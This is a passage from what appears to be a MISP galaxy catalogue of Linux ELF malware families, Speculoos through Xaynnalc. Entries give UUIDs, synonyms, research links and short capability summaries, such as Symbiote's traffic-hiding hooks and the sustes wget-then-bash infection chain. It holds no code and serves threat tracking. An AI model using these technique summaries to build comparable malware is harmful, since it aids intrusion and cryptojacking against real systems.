Speculoos
Internal MISP references
UUID df23ae3a-e10d-4c49-b379-2ea2fd1925af
which can be used as unique global reference for Speculoos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SprySOCKS
Internal MISP references
UUID 3b5c485b-b6a6-4586-a7dc-9e23a3b0aa5a
which can be used as unique global reference for SprySOCKS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SSHDoor
Internal MISP references
UUID 275d65b9-0894-4c9b-a255-83daddb2589c
which can be used as unique global reference for SSHDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor - webarchive
- https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/ - webarchive
- https://www.trendmicro.com/en_in/research/24/e/router-roulette.html - webarchive
- http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stantinko
Internal MISP references
UUID e8c131df-ee3b-41d4-992d-71d3090d2d98
which can be used as unique global reference for Stantinko
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko - webarchive
- https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/ - webarchive
- https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/ - webarchive
- https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/ - webarchive
- https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/ - webarchive
- https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STEELCORGI
According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.
Internal MISP references
UUID 21ff33b5-ef21-4263-8747-7de3d2dbdde6
which can be used as unique global reference for STEELCORGI
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi - webarchive
- https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/ - webarchive
- https://www.mandiant.com/resources/unc2891-overview - webarchive
- https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sunless
Internal MISP references
UUID d03fa69b-53a4-4f61-b800-87e4246d2656
which can be used as unique global reference for Sunless
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
sustes miner
Sustes malware does not spread by itself (it is not a worm); it is distributed through exploitation and brute-force activity with a special focus on IoT devices and Linux servers. The initial infection stage consists of a custom wget run directly on the victim machine, followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software.
Internal MISP references
UUID 5c117b01-826b-4656-b6ca-8b18b6e6159f
which can be used as unique global reference for sustes miner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Suterusu
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Suterusu.
Known Synonyms |
---|
HCRootkit |
Internal MISP references
UUID d2748a0c-8739-4006-95c4-bdf6350d7fa9
which can be used as unique global reference for Suterusu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sword2033
Internal MISP references
UUID 9c1a32c7-45b4-4d3a-9d15-300b353f32a7
which can be used as unique global reference for Sword2033
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Symbiote
Malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods for hiding its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, and 3) a set of libpcap functions.
Internal MISP references
UUID 4339d876-768c-4cdf-941f-3f55a08aafca
which can be used as unique global reference for Symbiote
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote - webarchive
- https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat - webarchive
- https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html - webarchive
- https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ - webarchive
- https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote - webarchive
- https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SysJoker (ELF)
Internal MISP references
UUID c4b681ec-f5b5-433a-9314-07e06f739ba2
which can be used as unique global reference for SysJoker (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysjoker - webarchive
- https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/ - webarchive
- https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sysrv-hello (ELF)
Cryptojacking botnet
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sysrv-hello (ELF).
Known Synonyms |
---|
Sysrv |
Internal MISP references
UUID d471083a-c8e1-4d9b-907e-685c9a75c1f9
which can be used as unique global reference for Sysrv-hello (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysrvhello - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.lacework.com/sysrv-hello-expands-infrastructure/ - webarchive
- https://www.riskiq.com/blog/external-threat-management/sysrv-hello-cryptojacking-botnet/ - webarchive
- https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet - webarchive
- https://dfir.ch/posts/sysrv/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TeamTNT
TeamTNT, active since fall 2019, is a well-known threat actor that targets *nix-based systems and misconfigured Docker container environments. It has constantly evolved its capabilities for its cloud-based cryptojacking operations and has shifted its focus to compromising Kubernetes clusters.
Internal MISP references
UUID 24695f84-d3af-477e-92dd-c05c9536ebf5
which can be used as unique global reference for TeamTNT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials - webarchive
- https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server - webarchive
- https://www.aquasec.com/blog/fileless-malware-container-security/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/adept-libra/ - webarchive
- https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf - webarchive
- https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked - webarchive
- https://unit42.paloaltonetworks.com/atoms/thieflibra/ - webarchive
- https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html - webarchive
- https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ - webarchive
- https://www.aquasec.com/blog/teamtnt-reemerged-with-new-aggressive-cloud-campaign/ - webarchive
- https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/ - webarchive
- https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/ - webarchive
- https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf - webarchive
- https://www.aquasec.com/blog/threat-alert-anatomy-of-silentbobs-cloud-attack/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera - webarchive
- https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool - webarchive
- https://www.aquasec.com/blog/container-attacks-on-redis-servers/ - webarchive
- https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html - webarchive
- https://tolisec.com/active-crypto-mining-operation-by-teamtnt/ - webarchive
- https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools - webarchive
- https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/ - webarchive
- https://www.aquasec.com/blog/container-security-tnt-container-attack/ - webarchive
- https://sysdig.com/blog/teamtnt-aws-credentials/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TheMoon
Internal MISP references
UUID ed098719-797b-4cb3-a73c-65b6d08ebdfa
which can be used as unique global reference for TheMoon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon - webarchive
- https://blog.lumen.com/a-new-phase-of-themoon/ - webarchive
- https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers - webarchive
- https://blog.lumen.com/the-darkside-of-themoon - webarchive
- https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TNTbotinger
Internal MISP references
UUID 00319b53-e31c-4623-a3ac-9a18bc52bf36
which can be used as unique global reference for TNTbotinger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Torii
Internal MISP references
UUID a874575e-0ad7-464d-abb6-8f4b7964aa92
which can be used as unique global reference for Torii
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TripleCross
According to its author, TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology.
Internal MISP references
UUID a462c60d-a7f9-4a05-aaa1-be415870310e
which can be used as unique global reference for TripleCross
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Trump Bot
Internal MISP references
UUID feb6a5f6-32f9-447d-af9c-08e499457883
which can be used as unique global reference for Trump Bot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TSCookie
Internal MISP references
UUID 592f7cc6-1e07-4d83-8082-aef027e9f1e2
which can be used as unique global reference for TSCookie
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf - webarchive
- https://twitter.com/ESETresearch/status/1382054011264700416 - webarchive
- https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf - webarchive
- https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020 - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
tsh
Internal MISP references
UUID 95a07de2-0e17-48a7-b935-0c1c0c0e39af
which can be used as unique global reference for tsh
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tsunami (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tsunami (ELF).
Known Synonyms |
---|
Amnesia |
Muhstik |
Radiation |
Internal MISP references
UUID 21540126-d0bb-42ce-9b93-341fedb94cac
which can be used as unique global reference for Tsunami (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami - webarchive
- https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers - webarchive
- https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/ - webarchive
- https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt - webarchive
- http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - webarchive
- https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ - webarchive
- https://sysdig.com/blog/muhstik-malware-botnet-analysis/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
- https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server - webarchive
- https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf - webarchive
- https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 - webarchive
- https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/ - webarchive
- https://blog.aquasec.com/fileless-malware-container-security - webarchive
- https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure - webarchive
- https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134 - webarchive
- https://www.aquasec.com/blog/threat-alert-anatomy-of-silentbobs-cloud-attack/ - webarchive
- https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/ - webarchive
- https://asec.ahnlab.com/en/54647/ - webarchive
- http://get.cyberx-labs.com/radiation-report - webarchive
- https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/ - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/ - webarchive
- https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/ - webarchive
- https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/ - webarchive
- https://www.aquasec.com/blog/container-security-tnt-container-attack/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Turla RAT
Internal MISP references
UUID 1b62a421-c0db-4425-bcb2-a4925d5d33e0
which can be used as unique global reference for Turla RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Umbreon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Umbreon.
Known Synonyms |
---|
Espeon |
Internal MISP references
UUID 637000f7-4363-44e0-b795-9cfb7a3dc460
which can be used as unique global reference for Umbreon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/ - webarchive
- http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified Linux 001
According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiate a crypto miner.
Internal MISP references
UUID b5b59d9f-f9e2-4201-a017-f2bae0470808
which can be used as unique global reference for Unidentified Linux 001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified ELF 004
Implant used by APT31 on compromised SOHO infrastructure, tries to camouflage as a tool ("unifi-video") related to Ubiquiti UniFi surveillance cameras.
Internal MISP references
UUID 44a57915-2ec0-476f-9f20-b11082f5b5a4
which can be used as unique global reference for Unidentified ELF 004
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 005 (Sidecopy)
Internal MISP references
UUID d49402b3-9f2a-4d9a-ae09-b1509da2e8fd
which can be used as unique global reference for Unidentified 005 (Sidecopy)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified ELF 006 (Tox Backdoor)
Enables remote execution of scripts on a host, communicates via Tox.
Internal MISP references
UUID 61a36688-0a4f-4899-8b17-ca0d5ff7e800
which can be used as unique global reference for Unidentified ELF 006 (Tox Backdoor)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hive (Vault 8)
Internal MISP references
UUID 721fa6d1-da73-4dd4-9154-a60ff4607467
which can be used as unique global reference for Hive (Vault 8)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vermilion Strike (ELF)
Internal MISP references
UUID a4ded098-be7b-4852-adfd-8971ace583f1
which can be used as unique global reference for Vermilion Strike (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/ - webarchive
- https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VPNFilter
Internal MISP references
UUID 5ad30da2-2645-4893-acd9-3f8e0fbb5500
which can be used as unique global reference for VPNFilter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en - webarchive
- https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1 - webarchive
- https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html - webarchive
- https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html - webarchive
- https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/ - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-054a - webarchive
- https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games - webarchive
- https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter - webarchive
- https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html - webarchive
- https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks - webarchive
- https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf - webarchive
- https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/ - webarchive
- https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware - webarchive
- https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected - webarchive
- https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://blog.talosintelligence.com/2018/05/VPNFilter.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WatchBog
According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C addresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.
Internal MISP references
UUID aa00d8c9-b479-4d05-9887-cd172a11cfc9
which can be used as unique global reference for WatchBog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WellMail
Internal MISP references
UUID 93ffafbd-a8af-4164-b3ab-9b21e6d09232
which can be used as unique global reference for WellMail
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail - webarchive
- https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c - webarchive
- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
elf.wellmess
Internal MISP references
UUID b0046a6e-3b8b-45ad-a357-dabc46aba7de
which can be used as unique global reference for elf.wellmess
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29 - webarchive
- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-116a - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://community.riskiq.com/article/541a465f/description - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WHIRLPOOL
Internal MISP references
UUID be3a5211-45a8-496a-974f-6ef14f44af3d
which can be used as unique global reference for WHIRLPOOL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhiteRabbit
Internal MISP references
UUID 901b88e6-4759-4aa6-b4d1-9f7da53c2adf
which can be used as unique global reference for WhiteRabbit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.whiterabbit - webarchive
- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Winnti (ELF)
Internal MISP references
UUID d6c5211e-506d-415c-b886-0ced529399a1
which can be used as unique global reference for Winnti (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti - webarchive
- https://asec.ahnlab.com/en/55785/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a - webarchive
- https://blog.exatrack.com/melofee/ - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wirenet (ELF)
Internal MISP references
UUID 47a8fedb-fd60-493a-9b7d-082bdb85621e
which can be used as unique global reference for Wirenet (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Agent (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (ELF).
Known Synonyms |
---|
chopstick |
fysbis |
splm |
Internal MISP references
UUID a8404a31-968a-47e8-8434-533ceaf84c1f
which can be used as unique global reference for X-Agent (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent - webarchive
- https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/ - webarchive
- https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/ - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xanthe
Internal MISP references
UUID 55b4d75f-adcc-47df-81cf-6c93ccb54a56
which can be used as unique global reference for Xanthe
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe - webarchive
- https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html - webarchive
- https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xaynnalc
Internal MISP references
UUID 32b95dc7-03a6-45ab-a991-466208dd92d2
which can be used as unique global reference for Xaynnalc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
